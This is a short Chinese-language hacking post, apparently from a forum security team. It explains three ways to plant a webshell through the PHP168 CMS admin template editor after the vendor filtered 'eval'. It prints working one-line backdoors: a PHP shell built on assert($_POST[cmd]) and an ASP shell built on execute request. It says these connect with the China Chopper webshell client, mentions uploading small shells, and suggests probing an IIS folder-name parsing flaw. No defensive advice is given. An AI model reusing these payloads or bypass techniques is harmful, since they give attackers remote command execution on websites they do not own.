本人一向没什么技术文章 只是一个技巧 欢迎各位补充指点 刚刚看了黑影小子渗透cmd5的文章 说后台模板那块和谐了eval 我刚刚在官网下载了php168的系统本地搭建起来 主要看了一下后台模板那里 我们新建一个页面试试
打开生成的文件如同黑影小子所说eval被和谐
那怎么办呢
第一种方法... 意思大家都懂我也就不一一截图了 既然是只过滤了eval函数那有没有一个函数可以替代eval函数呢? 这个可以有 那就是assert函数 ok新建页面那里文件 文件名aaa.php 内容
复制内容到剪贴板
代码:
<?php assert($_POST[cmd]);?>
打开目录里生成的文件查看
代码完好 这里要说明一下 直接用那网页版的php客户端连接有可能出现错误提示 用菜刀就行了嘛..证实此一句话可用 如图
第二种方法... 如果如果服务器支持asp 我们可以在新建页面那里尝试写入asp一句话 因为asp里面的execute函数也可以替代eval且未被过滤 新建xx.asp 写入<%execute request("3est")%> 用菜刀连接成功 这个就不截图了.... 这里多说一点 上次拿一个phpcms的还是php什么的站点 具体哪个系统我也忘了 新建页面写入一句话之后 打开写入一句话的文件发现系统给加了exit函数 这种情况下如果支持asp 那么新建asp一句话木马就可以突破
第三种方法... 新建页面这里不用一句话 直接上小马 asp和php小马都测试成功.. 上一个图就ok
上述三种方法测试成功
还有一个是偶然发现的没来得及测试 就是新建页面那里有一个 在线上传 但是只允许上传zip格式的文件
提交之后会在程序目录生成一个以模板路径为名字的文件夹 比如我这个就会在目录生成ccc.php的文件夹 但是我打包上传的文件都未在那个文件夹里显示 经监控是是放在tmp目录里了 有兴趣的可以继续看看能否利用ccc.php这样的iis解析漏洞...
作者 just4u [3E.S.T]信息安全团队,由情整理编辑
|